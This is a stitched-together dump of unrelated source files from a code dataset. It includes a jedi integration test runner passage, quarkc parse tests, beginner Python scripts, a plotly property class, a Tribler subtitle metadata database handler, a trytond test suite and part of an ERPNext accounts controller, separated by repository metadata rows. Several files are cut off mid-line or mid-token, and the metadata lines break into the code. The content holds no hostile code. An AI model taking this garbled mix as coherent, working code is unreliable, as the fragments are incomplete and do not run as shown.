.. _tox: http://testrun.org/tox
Integration test cases are located in ``test/completion`` directory
and each test cases are indicated by the comment ``#?`` (completions /
definitions), ``#!`` (assignments) and ``#<`` (usages). There is also
support for third party libraries. In a normal test run they are not
being executed, you have to provide a ``--thirdparty`` option.
In addition to standard `-k` and `-m` options in py.test, you can use
`-T` (`--test-files`) option to specify integration test cases to run.
It takes the format of ``FILE_NAME[:LINE[,LINE[,...]]]`` where
``FILE_NAME`` is a file in ``test/completion`` and ``LINE`` is a line
number of the test comment. Here is some recipes:
Run tests only in ``basic.py`` and ``imports.py``::
py.test test/test_integration.py -T basic.py -T imports.py
Run test at line 4, 6, and 8 in ``basic.py``::
py.test test/test_integration.py -T basic.py:4,6,8
See ``py.test --help`` for more information.
If you want to debug a test, just use the ``--pdb`` option.
Alternate Test Runner
+++++++++++++++++++++
If you don't like the output of ``py.test``, there's an alternate test runner
that you can start by running ``./run.py``. The above example could be run by::
./run.py basic 4 6 8 50-80
The advantage of this runner is simplicity and more customized error reports.
Using both runners will help you to have a quicker overview of what's
happening.
Auto-Completion
+++++++++++++++
Uses comments to specify a test in the next line. The comment says, which
results are expected. The comment always begins with `#?`. The last row
symbolizes the cursor.
For example::
#? ['real']
a = 3; a.rea
Because it follows ``a.rea`` and a is an ``int``, which
|
has a ``real``
property.
Goto Definitions
++++++++++++++
|
++
Definition tests use the same symbols like completion tests. This is
possible because the completion tests are defined with a list::
#? int()
ab = 3; ab
Goto Assignments
++++++++++++++++
Tests look like this::
abc = 1
#! ['abc=1']
abc
Additionally it is possible to add a number which describes to position of
the test (otherwise it's just end of line)::
#! 2 ['abc=1']
abc
Usages
++++++
Tests look like this::
abc = 1
#< abc@1,0 abc@3,0
abc
"""
import os
import re
import sys
import operator
from ast import literal_eval
from io import StringIO
from functools import reduce
import jedi
from jedi._compatibility import unicode, is_py3
from jedi.parser import Parser, load_grammar
from jedi.api.classes import Definition
TEST_COMPLETIONS = 0
TEST_DEFINITIONS = 1
TEST_ASSIGNMENTS = 2
TEST_USAGES = 3
class IntegrationTestCase(object):
def __init__(self, test_type, correct, line_nr, column, start, line,
path=None, skip=None):
self.test_type = test_type
self.correct = correct
self.line_nr = line_nr
self.column = column
self.start = start
self.line = line
self.path = path
self.skip = skip
@property
def module_name(self):
return os.path.splitext(os.path.basename(self.path))[0]
@property
def line_nr_test(self):
"""The test is always defined on the line before."""
return self.line_nr - 1
def __repr__(self):
return '<%s: %s:%s:%s>' % (self.__class__.__name__, self.module_name,
self.line_nr_test, self.line.rstrip())
def script(self):
return jedi.Script(self.source, self.line_nr, self.column, self.path)
def run(self, compare_cb):
testers = {
TEST_COMPLETIONS: self.run_completion,
TEST_DEFINITIONS: self.run_goto_definitions,
TEST_ASSIGNMENTS: self.run_goto_assignments,
TEST_USAGES: self.run_usages,
}
return testers[self.test_type](compare_cb)
def run_completion(self, compare_cb):
completions = self.script().completions()
#import cProfile; cProfile.run('script.completions()')
comp_str = set([c.name for c in completions])
return compare_cb(self, comp_str, set(literal_eval(self.correct)))
def run_goto_definitions(self, compare_cb):
script = self.script()
evaluator = script._evaluator
def comparison(definition):
suffix = '()' if definition.type == 'instance' else ''
return definition.desc_with_module + suffix
def definition(correct, correct_start, path):
should_be = set()
for match in re.finditer('(?:[^ ]+)', correct):
string = match.group(0)
parser = Parser(load_grammar(), string, start_symbol='eval_input')
parser.position_modifier.line = self.line_nr
element = parser.get_parsed_node()
element.parent = jedi.api.completion.get_user_scope(
script._get_module(),
(self.line_nr, self.column)
)
results = evaluator.eval_element(element)
if not results:
raise Exception('Could not resolve %s on line %s'
% (match.string, self.line_nr - 1))
should_be |= set(Definition(evaluator, r) for r in results)
# Because the objects have different ids, `repr`, then compare.
should = set(comparison(r) for r in should_be)
return should
should = definition(self.correct, self.start, script.path)
result = script.goto_definitions()
is_str = set(comparison(r) for r in result)
return compare_cb(self, is_str, should)
def run_goto_assignments(self, compare_cb):
result = self.script().goto_assignments()
comp_str = str(sorted(str(r.description) for r in result))
return compare_cb(self, comp_str, self.correct)
def run_usages(self, compare_cb):
result = self.script().usages()
self.correct = self.correct.strip()
compare = sorted((r.module_name, r.line, r.column) for r in result)
wanted = []
if not self.correct:
positions = []
else:
positions = literal_eval(self.correct)
for pos_tup in positions:
if type(pos_tup[0]) == str:
# this means that there is a module specified
wanted.append(pos_tup)
else:
line = pos_tup[0]
if pos_tup[0] is not None:
line += self.line_nr
wanted.append((self.module_name, line, pos_tup[1]))
return compare_cb(self, compare, sorted(wanted))
def skip_python_version(line):
comp_map = {
'==': 'eq',
'<=': 'le',
'>=': 'ge',
'<': 'gk',
'>': 'lt',
}
# check for python minimal version number
match = re.match(r" *# *python *([<>]=?|==) *(\d+(?:\.\d+)?)$", line)
if match:
minimal_python_version = tuple(
map(int, match.group(2).split(".")))
operation = getattr(operator, comp_map[match.group(1)])
if not operation(sys.version_info, minimal_python_version):
return "Minimal python version %s %s" % (match.group(1), match.group(2))
return None
def collect_file_tests(path, lines, lines_to_execute):
def makecase(
|
bozzzzo/quark
|
quarkc/test/test_parse.py
|
Python
|
apache-2.0
| 1,856
| 0.003233
|
# Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, pytest
from quarkc.compiler import Compiler
from .util
|
import assert_file, maybe_xfail, is_excluded_file
directory = os.path.join(os.path.dirname(__file__), "parse")
files = [name for name in os.listdir(directory
|
) if name.endswith(".q")]
paths = [os.path.join(directory, name) for name in files]
@pytest.fixture(params=paths)
def path(request):
return request.param
def test_parse(path):
parse(path, is_excluded_file)
def test_parse_builtin():
parse(os.path.join(directory, "empty-file.q"), lambda x: False)
def parse(path, file_filter):
dir = os.path.dirname(path)
text = open(path).read()
maybe_xfail(text)
c = Compiler()
c.urlparse(path, recurse=False)
for ast in c.roots[path].files:
if file_filter(ast.filename): continue
base = os.path.splitext(ast.filename)[0]
assert_file(os.path.join(dir, base + ".ast"), ast.pprint())
code = ast.code()
assert_file(os.path.join(dir, base + ".code"), code)
rtc = Compiler()
rtc.urlparse(base + ".code", recurse=False)
for f in rtc.roots[base + ".code"].files:
if f.name == base + ".code":
assert f.code() == code
break
else:
assert False
|
precompiler/python-101
|
learning-python/ch03/ConditionalProgramming.py
|
Python
|
apache-2.0
| 413
| 0.002421
|
income = 15000
if income < 10000:
taxCoefficient = 0.0
elif income < 30000:
taxCoefficient = 0.2
elif income < 100000:
taxCoefficient = 0.35
else:
taxCoefficient = 0.45
print("Need to pay: "
|
, income * taxCoefficient, "in taxes")
flag = False
if flag:
print("a")
print("b")
if fl
|
ag:
print("c")
print("d")
orderAmount = 300
discount = 25 if orderAmount > 100 else 0
print(discount)
|
elizabethtweedale/HowToCode2
|
SuperSkill-08-Teacher/Teacher-Quiz.py
|
Python
|
gpl-3.0
| 3,594
| 0.010295
|
# Teacher Quiz - Python Code - Elizabeth Tweedale
import csv, random
def askName(): # askName function returns the name of the student
print("Welcome to the Super Python Quiz!")
yourName = input("What is your name? ")
print ("Hello",str(yourName))
return yourName
def getQuestions(): # getQuestions reads in the questions from a CSV file
questions = [] # this creates an empty list for adding th
|
e questions to
with open("SuperPythonQuiz.csv", mode="r", encoding="utf-8") as myFile:
myQuiz = csv.reader(myFile)
for row in myQuiz:
questions.append(row)
return questions
def askQuestion(question,score):
|
# askQuestion prints the question and choices to the screen then checks the answer
print(question[0]) # print the question - this is in the [0] position of the row
for eachChoice in question[1:-1]: # print each choice from [1] to the last position [-1]
print("{0:>5}{1}".format("", eachChoice))
answer = input("Please select an answer: ") # get the student's answer
if answer == question[-1]: # check if the answer matches the last position in the question, the correct answer
print("Correct!") # if it's correct, tell the user and add one to the score
score += 1
else: # if it's incorrect, tell the user what the correct answer was
print("Incorrect, the correct answer was {0}.".format(question[-1]))
return score # return the score
def recordScore(studentName, score):
with open("QuizResults.txt", mode="a+",encoding="utf-8") as myFile: # note the '+' sign after the a means if the file does not exist, then create it
myFile.write(str(studentName) + "," + str(score) + "\n") # write name,score to the file
# "\n" will add a new line to the file so that it's ready for the next name
def main():
studentName = askName() # call the askName function
questions = getQuestions() # call the getQuestions function
score = 0 # initialise the score to 0
number = len(questions) # use the number to keep track of the total number of questions - which is the length of the 'questions' list
for eachQuestion in range(number): # reppeat for each question
question = random.choice(questions) # choose a random question from the questions list
score = askQuestion(question,score) # ask the question and update the score
questions.remove(question) # remove the current question from the list so that you don't ask it again
print("Your final score is:", score, "out of:", number) # tell the user what their final score is
recordScore(studentName, score) # call the recordScore function
main()
|
plotly/plotly.py
|
packages/python/plotly/plotly/graph_objs/scatter3d/marker/_line.py
|
Python
|
mit
| 24,077
| 0.000955
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scatter3d.marker"
_path_str = "scatter3d.marker.line"
_valid_props = {
"autocolorscale",
"cauto",
"cmax",
"cmid",
"cmin",
"color",
"coloraxis",
"colorscale",
"colorsrc",
"reversescale",
"width",
}
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is true, the
default palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `marker.line.color`) or the
bounds set in `marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a numerical
array. Defaults to `false` when `marker.line.cmin` and
`marker.line.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be equidistant
to this point. Has an effect only if in `marker.line.color`is
set to a numerical array. Value should have the same units as
in `marker.line.color`. Has no effect when `marker.line.cauto`
is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# color
# -----
@property
def color(self):
"""
Sets themarker.linecolor. It accepts either a specific color or
an array of numbers that are mapped to the colorscale relative
to the max and min values of the array or relative to
`marker.line.cmin` and `marker.line.cmax` if set.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown,
|
burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
|
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A number that will be interpreted as a color
according to scatter3d.marker.line.colorscale
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a nu
|
egbertbouman/tribler-g
|
Tribler/Core/CacheDB/MetadataDBHandler.py
|
Python
|
lgpl-2.1
| 40,875
| 0.013187
|
# Written by Andrea Reale
# see LICENSE.txt for license information
from Tribler.Core.Subtitles.MetadataDomainObjects.SubtitleInfo import SubtitleInfo
from Tribler.Core.Subtitles.MetadataDomainObjects.MetadataDTO import MetadataDTO
from Tribler.Core.CacheDB.SqliteCacheDBHandler import BasicDBHandler
import threading
from Tribler.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
import sys
from Tribler.Core.Subtitles.MetadataDomainObjects.MetadataExceptions import SignatureException, \
MetadataDBException
from Tribler.Core.Utilities.utilities import bin2str, str2bin
import sqlite3
import time
SUBTITLE_LANGUAGE_CODE = "lang"
SUBTITLE_PATH = "path"
METADATA_TABLE = "Metadata"
MD_ID_KEY = "metadata_id"
MD_PUBLISHER_KEY = "publisher_id"
MD_INFOHASH_KEY = "infohash"
MD_DESCRIPTION_KEY = "description"
MD_TIMESTAMP_KEY = "timestamp"
MD_SIGNATURE_KEY = "signature"
SUBTITLES_TABLE = "Subtitles"
SUB_MD_FK_KEY = "metadata_id_fk"
SUB_LANG_KEY = "subtitle_lang"
SUB_LOCATION_KEY = "subtitle_location"
SUB_CHECKSUM_KEY = "checksum"
SUBTITLES_HAVE_TABLE = "SubtitlesHave"
SH_MD_FK_KEY = "metadata_id_fk"
SH_PEER_ID_KEY = "peer_id"
SH_HAVE_MASK_KEY = "have_mask"
SH_TIMESTAMP = "received_ts"
# maximum number of have entries returned
# by the database (-1 for unlimited)
SH_RESULTS_LIMIT = 200
DEBUG = False
#it's good to have all of the queries in one place:
#the code is more easy to read, and if some query is wrong
#it is easier to correct them all
SELECT_SUBS_JOIN_BASE = "SELECT sub." + SUB_MD_FK_KEY + ", sub." + SUB_LANG_KEY \
+ ", sub." + SUB_LOCATION_KEY \
+ ", sub." + SUB_CHECKSUM_KEY \
+ " FROM " + METADATA_TABLE + " AS md " \
+ "INNER JOIN " \
+ SUBTITLES_TABLE + " AS sub " \
+ "ON md." + MD_ID_KEY + " = sub." + SUB_MD_FK_KEY
MD_SH_JOIN_CLAUSE = \
METADATA_TABLE + " AS md " \
+ "INNER JOIN " \
+ SUBTITLES_HAVE_TABLE + " AS sh " \
+ "ON md." + MD_ID_KEY + " = sh." + SH_MD_FK_KEY
QUERIES = {
"SELECT SUBS JOIN HASH ALL" :
SELECT_SUBS_JOIN_BASE
+ " WHERE md." + MD_INFOHASH_KEY + " = ?"\
+ " AND md." + MD_PUBLISHER_KEY + " = ?;",
"SELECT SUBS JOIN HASH ONE" :
SELECT_SUBS_JOIN_BASE
+ " WHERE md." + MD_INFOHASH_KEY + " = ?"\
+ " AND md." + MD_PUBLISHER_KEY + " = ?"\
+ " AND sub." + SUB_LANG_KEY + " = ?;",
"SELECT SUBS FK ALL" :
"SELECT * FROM " + SUBTITLES_TABLE
+ " WHERE " + SUB_MD_FK_KEY + " = ?;",
"SELECT SUBS FK ONE" :
"SELECT * FROM " + SUBTITLES_TABLE
+ " WHERE " + SUB_MD_FK_KEY + " = ?"\
+ " AND " + SUB_LANG_KEY + " = ?;",
"SELECT METADATA" :
"SELECT * FROM " \
+ METADATA_TABLE + " WHERE " + MD_INFOHASH_KEY + " = ?" \
+ " AND " + MD_PUBLISHER_KEY + " = ?;",
"SELECT NRMETADATA" :
"SELECT COUNT(*) FROM " \
+ METADATA_TABLE + " WHERE " + MD_PUBLISHER_KEY + " = ?;",
"SELECT PUBLISHERS FROM INFOHASH":
"SELECT " + MD_PUBLISHER_KEY + " FROM " + METADATA_TABLE \
+ " WHERE " + MD_INFOHASH_KEY + " = ?;",
"UPDATE METADATA" :
"UPDATE " + METADATA_TABLE \
+ " SET " \
+ MD_DESCRIPTION_KEY + " = ?, " \
+ MD_TIMESTAMP_KEY + " = ?, " \
+ MD_SIGNATURE_KEY + " = ?" \
+ " WHERE " + MD_INFOHASH_KEY + " = ?" \
+ " AND " + MD_PUBLISHER_KEY + " = ?;",
"UPDATE SUBTITLES" :
"UPDATE " + SUBTITLES_TABLE \
+ " SET " + SUB_LOCATION_KEY + "= ?, " \
+ SUB_CHECKSUM_KEY + "= ?" \
+ " WHERE " + SUB_MD_FK_KEY + "= ?" \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ONE SUBTITLES" :
"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY + "= ? " \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ONE SUBTITLE JOIN" :
"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY \
+ " IN ( SELECT " + MD_ID_KEY + " FROM " + METADATA_TABLE \
+ " WHERE " + MD_PUBLISHER_KEY + " = ?" \
+ " AND " + MD_INFOHASH_KEY + " = ? )" \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ALL SUBTITLES" :
"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY + "= ?;",
"DELETE METADATA PK" :
"DELETE FROM " + METADATA_TABLE \
+ " WHERE " + MD_ID_KEY + " = ?;",
"INSERT METADATA" :
"INSERT or IGNORE INTO " + METADATA_TABLE + " VALUES " \
+ "(NULL,?,?,?,?,?)",
"INSERT SUBTITLES" :
"INSERT INTO " + SUBTITLES_TABLE + " VALUES (?, ?, ?, ?);",
"SELECT SUBTITLES WITH PATH":
"SELECT sub." + SUB_MD_FK_KEY + ", sub." + SUB_LOCATION_KEY + ", sub." \
+ SUB_LANG_KEY + ", sub." + SUB_CHECKSUM_KEY \
+ ", m." + MD_PUBLISHER_KEY + ", m." + MD_INFOHASH_KEY \
+ " FROM " + METADATA_TABLE + " AS m " \
+"INNER JOIN " + SUBTITLES_TABLE + " AS sub "\
+ "ON m." + MD_ID_KEY + " = " + " sub." + SUB_MD_FK_KEY \
+ " WHERE " \
+ SUB_LOCATION_KEY + " IS NOT NULL;",
"SELECT SUBTITLES WITH PATH BY CHN INFO":
"SELECT sub." + SUB_LOCATION_KEY + ", sub." \
+ SUB_LANG_KEY + ", sub." + SUB_CHECKSUM_KEY \
+ " FROM " + METADATA_TABLE + " AS m " \
+"INNER JOIN " + SUBTITLES_TABLE + " AS sub "\
+ "ON m." + MD_ID_KEY + " = " + " sub." + SUB_MD_FK_KEY \
+ " WHERE sub." \
+ SUB_LOCATION_KEY + " IS NOT NULL" \
+ " AND m." + MD_PUBLISHER_KEY + " = ?"\
+ " AND m." + MD_INFOHASH_KEY + " = ?;" ,
"INSERT HAVE MASK":
"INSERT INTO " + SUBTITLES_HAVE_TABLE + " VALUES " \
+ "(?, ?, ?, ?);",
"GET ALL HAVE MASK":
"SELECT sh." + SH_PEER_ID_KEY + ", sh." + SH_HAVE_MASK_KEY \
+ ", sh." + SH_TIMESTAMP \
+ " FROM " + MD_SH_JOIN_CLAUSE + " WHERE md." + MD_PUBLISHER_KEY \
+ " = ? AND md." + MD_INFOHASH_KEY + " = ? "\
+ "ORDER BY sh." + SH_TIMESTAMP + " DESC" \
+ " LIMIT " + str(SH_RESULTS_LIMIT) + ";",
"GET ONE HAVE MASK":
"SELECT sh." + SH_HAVE_MASK_KEY \
+ ", sh." + SH_TIMESTAMP \
+ " FROM " + MD_SH_JOIN_CLAUSE + " WHERE md." + MD_PUBLISHER_KEY \
+ " = ? AND md." + MD_INFOHASH_KEY + " = ? AND sh." + SH_PEER_ID_KEY \
+ " = ?;",
"UPDATE HAVE MASK":
"UPDATE " + SUBTITLES_HAVE_TABLE \
+ " SET " + SH_HAVE_MASK_KEY + " = ?, " \
+ SH_TIMESTAMP + " = ?" \
+ " WHERE " + SH_PEER_ID_KEY + " = ?" \
+ " AND " + SH_MD_FK_KEY + " IN " \
+ "( SELECT + " + MD_ID_KEY+ " FROM " \
+ METADATA_TABLE + " WHERE + "\
+ MD_PUBLISHER_KEY + " = ?"\
+ " AND " + MD_INFOHASH_KEY + " = ? );",
"DELETE HAVE":
"DELETE FROM " + SUBTITLES_HAVE_TABLE \
+ " WHERE " + SH_PEER_ID_KEY + " = ?" \
+ " AND
|
" + SH_MD_FK_KEY + " IN " \
+ "( SELECT + " + MD_ID_KEY+ " FROM " \
+ METADATA_TABLE + " WHERE + "\
+ MD_PUBLISHER_KEY + " = ?"\
+ " AND " + MD_INFOHASH_KEY + " = ? );",
"CLEANUP OLD HAVE":
"DELETE FROM " + SUBTITLES_HAVE_TABLE \
+ " WHERE " + SH_TIMESTAMP + " < ? " \
+ " AND " +
|
SH_PEER_ID_KEY + " NOT IN " \
+ "( SELECT md." + MD_PUBLISHER_KEY + " FROM " \
+ METADATA_TABLE + " AS md W
|
joeirimpan/trytond-invoice-payment-gateway
|
tests/__init__.py
|
Python
|
bsd-3-clause
| 414
| 0.002415
|
# -*- coding: utf-8 -*-
import unittest
import trytond.tests.test_tryton
from test_invoice import TestInvoice
def suite():
"""
Define suite
"""
test_suite = trytond.tests.test_tryton.suite()
test_suite.addTests([
unittest.TestLoader().loa
|
dTestsFromTestCase(TestInvoice),
])
return
|
test_suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
|
bazz-erp/erpnext
|
erpnext/controllers/accounts_controller.py
|
Python
|
gpl-3.0
| 30,488
| 0.024829
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, erpnext
from frappe import _, throw
from frappe.utils import today, flt, cint, fmt_mone
|
y, formatdate, getdate
from erpnext.setup.utils import get_exchange_rate
from erpnext.accounts.utils import get_fiscal_years, validate_fiscal_year, get_account_currency
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.contr
|
ollers.recurring_document import convert_to_recurring, validate_recurring_document
from erpnext.controllers.sales_and_purchase_return import validate_return
from erpnext.accounts.party import get_party_account_currency, validate_party_frozen_disabled
from erpnext.exceptions import InvalidCurrency
force_item_fields = ("item_group", "barcode", "brand", "stock_uom")
class AccountsController(TransactionBase):
def __init__(self, arg1, arg2=None):
super(AccountsController, self).__init__(arg1, arg2)
@property
def company_currency(self):
if not hasattr(self, "__company_currency"):
self.__company_currency = erpnext.get_company_currency(self.company)
return self.__company_currency
def onload(self):
self.get("__onload").make_payment_via_journal_entry = frappe.db.get_single_value('Accounts Settings', 'make_payment_via_journal_entry')
def validate(self):
if self.get("_action") and self._action != "update_after_submit":
self.set_missing_values(for_validate=True)
self.validate_date_with_fiscal_year()
if self.meta.get_field("currency"):
self.calculate_taxes_and_totals()
if not self.meta.get_field("is_return") or not self.is_return:
self.validate_value("base_grand_total", ">=", 0)
validate_return(self)
self.set_total_in_words()
if self.doctype in ("Sales Invoice", "Purchase Invoice") and not self.is_return:
self.validate_due_date()
self.validate_advance_entries()
if self.meta.get_field("taxes_and_charges"):
self.validate_enabled_taxes_and_charges()
self.validate_party()
self.validate_currency()
if self.meta.get_field("is_recurring"):
if self.amended_from and self.recurring_id == self.amended_from:
self.recurring_id = None
if not self.get("__islocal"):
validate_recurring_document(self)
convert_to_recurring(self, self.get("posting_date") or self.get("transaction_date"))
if self.doctype == 'Purchase Invoice':
self.validate_paid_amount()
def before_print(self):
if self.doctype in ['Purchase Order', 'Sales Order']:
if self.get("group_same_items"):
self.group_similar_items()
def validate_paid_amount(self):
if hasattr(self, "is_pos") or hasattr(self, "is_paid"):
is_paid = self.get("is_pos") or self.get("is_paid")
if cint(is_paid) == 1:
if flt(self.paid_amount) == 0 and flt(self.outstanding_amount) > 0:
if self.cash_bank_account:
self.paid_amount = flt(flt(self.grand_total) - flt(self.write_off_amount),
self.precision("paid_amount"))
self.base_paid_amount = flt(self.paid_amount * self.conversion_rate, self.precision("base_paid_amount"))
else:
# show message that the amount is not paid
self.paid_amount = 0
frappe.throw(_("Note: Payment Entry will not be created since 'Cash or Bank Account' was not specified"))
else:
frappe.db.set(self,'paid_amount',0)
def on_update_after_submit(self):
if self.meta.get_field("is_recurring"):
validate_recurring_document(self)
convert_to_recurring(self, self.get("posting_date") or self.get("transaction_date"))
def set_missing_values(self, for_validate=False):
if frappe.flags.in_test:
for fieldname in ["posting_date","transaction_date"]:
if self.meta.get_field(fieldname) and not self.get(fieldname):
self.set(fieldname, today())
break
def calculate_taxes_and_totals(self):
from erpnext.controllers.taxes_and_totals import calculate_taxes_and_totals
calculate_taxes_and_totals(self)
if self.doctype in ["Quotation", "Sales Order", "Delivery Note", "Sales Invoice"]:
self.calculate_commission()
self.calculate_contribution()
def validate_date_with_fiscal_year(self):
if self.meta.get_field("fiscal_year") :
date_field = ""
if self.meta.get_field("posting_date"):
date_field = "posting_date"
elif self.meta.get_field("transaction_date"):
date_field = "transaction_date"
if date_field and self.get(date_field):
validate_fiscal_year(self.get(date_field), self.fiscal_year, self.company,
self.meta.get_label(date_field), self)
def validate_due_date(self):
from erpnext.accounts.party import validate_due_date
if self.doctype == "Sales Invoice":
if not self.due_date:
frappe.throw(_("Due Date is mandatory"))
validate_due_date(self.posting_date, self.due_date, "Customer", self.customer, self.company)
elif self.doctype == "Purchase Invoice":
validate_due_date(self.posting_date, self.due_date, "Supplier", self.supplier, self.company)
def set_price_list_currency(self, buying_or_selling):
if self.meta.get_field("posting_date"):
transaction_date = self.posting_date
else:
transaction_date = self.transaction_date
if self.meta.get_field("currency"):
# price list part
fieldname = "selling_price_list" if buying_or_selling.lower() == "selling" \
else "buying_price_list"
if self.meta.get_field(fieldname) and self.get(fieldname):
self.price_list_currency = frappe.db.get_value("Price List",
self.get(fieldname), "currency")
if self.price_list_currency == self.company_currency:
self.plc_conversion_rate = 1.0
elif not self.plc_conversion_rate:
self.plc_conversion_rate = get_exchange_rate(self.price_list_currency,
self.company_currency, transaction_date)
# currency
if not self.currency:
self.currency = self.price_list_currency
self.conversion_rate = self.plc_conversion_rate
elif self.currency == self.company_currency:
self.conversion_rate = 1.0
elif not self.conversion_rate:
self.conversion_rate = get_exchange_rate(self.currency,
self.company_currency, transaction_date)
def set_missing_item_details(self, for_validate=False):
"""set missing item values"""
from erpnext.stock.get_item_details import get_item_details
from erpnext.stock.doctype.serial_no.serial_no import get_serial_nos
if hasattr(self, "items"):
parent_dict = {}
for fieldname in self.meta.get_valid_columns():
parent_dict[fieldname] = self.get(fieldname)
if self.doctype in ["Quotation", "Sales Order", "Delivery Note", "Sales Invoice"]:
document_type = "{} Item".format(self.doctype)
parent_dict.update({"document_type": document_type})
for item in self.get("items"):
if item.get("item_code"):
args = parent_dict.copy()
args.update(item.as_dict())
args["doctype"] = self.doctype
args["name"] = self.name
if not args.get("transaction_date"):
args["transaction_date"] = args.get("posting_date")
if self.get("is_subcontracted"):
args["is_subcontracted"] = self.is_subcontracted
ret = get_item_details(args)
for fieldname, value in ret.items():
if item.meta.get_field(fieldname) and value is not None:
if (item.get(fieldname) is None or fieldname in force_item_fields):
item.set(fieldname, value)
elif fieldname in ['cost_center', 'conversion_factor'] and not item.get(fieldname):
item.set(fieldname, value)
elif fieldname == "serial_no":
stock_qty = item.get("stock_qty") * -1 if item.get("stock_qty") < 0 else item.get("stock_qty")
if stock_qty != len(get_serial_nos(item.get('serial_no'))):
item.set(fieldname, value)
